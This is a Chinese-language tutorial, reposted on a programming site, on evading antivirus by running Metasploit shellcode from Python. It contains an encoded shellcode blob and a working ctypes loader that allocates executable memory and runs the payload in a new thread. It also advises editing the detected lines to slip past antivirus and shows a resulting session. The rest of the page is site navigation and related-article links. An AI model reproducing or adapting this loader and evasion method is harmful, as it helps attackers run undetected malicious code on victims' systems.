首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

通过Python实现Payload分离免杀过程详解

Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

通过Python实现Payload分离免杀过程详解

- Author -

返回主页aptkekeo

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
Python中文件遍历的两种方法
Jun 16 Python
跟老齐学Python之从if开始语句的征程
Sep 14 Python
简单谈谈python的反射机制
Jun 28 Python
Python实现选择排序
Jun 04 Python
Python 逐行分割大txt文件的方法
Oct 10 Python
python 2.7.14安装图文教程
Apr 08 Python
Python并行分布式框架Celery详解
Oct 15 Python
python 对任意数据和曲线进行拟合并求出函数表达式的三种解决方案
Feb 18 Python
Python基于内置库pytesseract实现图片验证码识别功能
Feb 24 Python
Python基于class()实现面向对象原理详解
Mar 26 Python
python根据字典的键来删除元素的方法
Aug 16 Python
python实现测试工具(二)——简单的ui测试工具
Oct 19 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
Master(1) 主从复制(1) 表约束(2) ESXI(1) variables(1) Slave(1) caddy(1) SVN(1) NginxConfig(1) transaction(1)
You might like
php 5.3.5安装memcache注意事项小结
2011/04/12 PHP
ThinkPHP与PHPExcel冲突解决方法
2011/08/08 PHP
PHP中使用OpenSSL生成证书及加密解密
2017/02/05 PHP
js根据日期判断星座的示例代码
2014/01/23 Javascript
JQuery获取表格数据示例代码
2014/05/26 Javascript
js常用数组操作方法简明总结
2014/06/20 Javascript
原生js实现复制对象、扩展对象 类似jquery中的extend()方法
2014/08/30 Javascript
jquery实现兼容IE8的异步上传文件
2015/06/15 Javascript
由简入繁实现Jquery树状结构的方法(推荐)
2016/06/10 Javascript
微信小程序页面生命周期详解
2018/01/31 Javascript
分享5个小技巧让你写出更好的 JavaScript 条件语句
2018/10/20 Javascript
微信小程序Page中data数据操作和函数调用方法
2019/05/08 Javascript
微信小程序实现录音时的麦克风动画效果实例
2019/05/18 Javascript
nodejs实现用户登录路由功能
2019/05/22 NodeJs
vue遍历对象中的数组取值示例
2019/11/07 Javascript
js操作两个json数组合并、去重,以及删除某一项元素
2020/09/22 Javascript
Python之PyUnit单元测试实例
2014/10/11 Python
Linux系统上Nginx+Python的web.py与Django框架环境
2015/12/25 Python
Django中ORM表的创建和增删改查方法示例
2017/11/15 Python
python2 与 pyhton3的输入语句写法小结
2018/09/10 Python
Python 3.6 中使用pdfminer解析pdf文件的实现
2019/09/25 Python
Python模拟登入的N种方式(建议收藏)
2020/05/31 Python
Python 如何在字符串中插入变量
2020/08/01 Python
详解HTML5中的picture元素响应式处理图片
2018/01/03 HTML / CSS
JD Sports法国:英国篮球和运动时尚的领导者
2017/09/28 全球购物
纽约和芝加哥当天送花:Ode à la Rose
2019/07/05 全球购物
Mamaearth官方网站:印度母婴护理产品公司
2019/10/06 全球购物
一些高难度的SQL面试题
2016/11/29 面试题
2014两会学习心得:时代的发展
2014/03/17 职场文书
产品质量承诺书
2014/03/27 职场文书
保健品市场营销方案
2014/03/31 职场文书
大班开学家长寄语
2014/04/04 职场文书
高中班主任评语大全
2014/04/25 职场文书
对照检查剖析材料
2014/09/30 职场文书
Python字符串的转义字符
2022/04/07 Python
MySQL约束(创建表时的各种条件说明)
2022/06/21 MySQL